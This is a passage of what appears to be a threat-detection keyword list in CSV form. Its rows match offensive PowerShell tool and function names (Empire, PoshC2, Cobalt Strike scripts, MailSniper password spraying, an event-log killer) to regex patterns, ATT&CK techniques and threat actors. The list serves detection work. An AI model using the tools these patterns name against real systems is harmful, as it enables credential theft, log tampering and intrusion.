T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49255"
"*Invoke-PacketKnock*",".{0,1000}Invoke\-PacketKnock.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerBreach.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49256"
"*Invoke-Pandemonium -Command*",".{0,1000}Invoke\-Pandemonium\s\-Command.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49257"
"*Invoke-Pandemonium.ps1*",".{0,1000}Invoke\-Pandemonium\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49258"
"*Invoke-Paranoia*",".{0,1000}Invoke\-Paranoia.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-Paranoia.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49259"
"*Invoke-Paranoia.ps1*",".{0,1000}Invoke\-Paranoia\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49260"
"*Invoke-ParentalKilling*",".{0,1000}Invoke\-ParentalKilling.{0,1000}","offensive_tool_keyword","cobaltstrike","powershell function used with cobaltstrike to kill parent process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","49261"
"*Invoke-PassSpray*",".{0,1000}Invoke\-PassSpray.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49262"
"*Invoke-PassSpray*",".{0,1000}Invoke\-PassSpray.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49263"
"*Invoke-PassSpray*",".{0,1000}Invoke\-PassSpray.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","1","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","49264"
"*Invoke-PasswordSpray*",".{0,1000}Invoke\-PasswordSpray.{0,1000}","offensive_tool_keyword","MailSniper","Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Exploitation tool","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49265"
"*Invoke-PasswordSprayEAS*",".{0,1000}Invoke\-PasswordSprayEAS.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","1","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","49266"
"*Invoke-PasswordSprayEAS*",".{0,1000}Invoke\-PasswordSprayEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49267"
"*Invoke-PasswordSprayEWS*",".{0,1000}Invoke\-PasswordSprayEWS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49268"
"*Invoke-PasswordSprayGmail*",".{0,1000}Invoke\-PasswordSprayGmail.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49269"
"*Invoke-PasswordSprayOWA*",".{0,1000}Invoke\-PasswordSprayOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49270"
"*Invoke-Patamenia.ps1*",".{0,1000}Invoke\-Patamenia\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49271"
"*Invoke-PatchDll -DllBytes *",".{0,1000}Invoke\-PatchDll\s\-DllBytes\s.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49272"
"*Invoke-PatchDll*",".{0,1000}Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUAC.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49273"
"*Invoke-PatchDll*",".{0,1000}Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PSInject.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49274"
"*Invoke-Pbind *",".{0,1000}Invoke\-Pbind\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49275"
"*Invoke-Pbind.ps1*",".{0,1000}Invoke\-Pbind\.ps1.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49276"
"*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49277"
"*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z","49278"
"*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","Invoke-Phant0m","This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running. I have made this script for two reasons. First. This script will help to Red Teams and Penetration Testers. Second. I want to learn Powershell and Low-Level things on Powershell for cyber security field","T1059 - T1086 - T1216","TA0007 - TA0008","N/A","N/A","Defense Evasion","https://github.com/hlldz/Invoke-Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","49279"
"*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","49280"
"*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49281"
"*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z","49282"
"*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","49283"
"*Invoke-PhishingLNK*",".{0,1000}Invoke\-PhishingLNK.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49284"
"*Invoke-PhishingLNK*",".{0,1000}Invoke\-PhishingLNK.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - 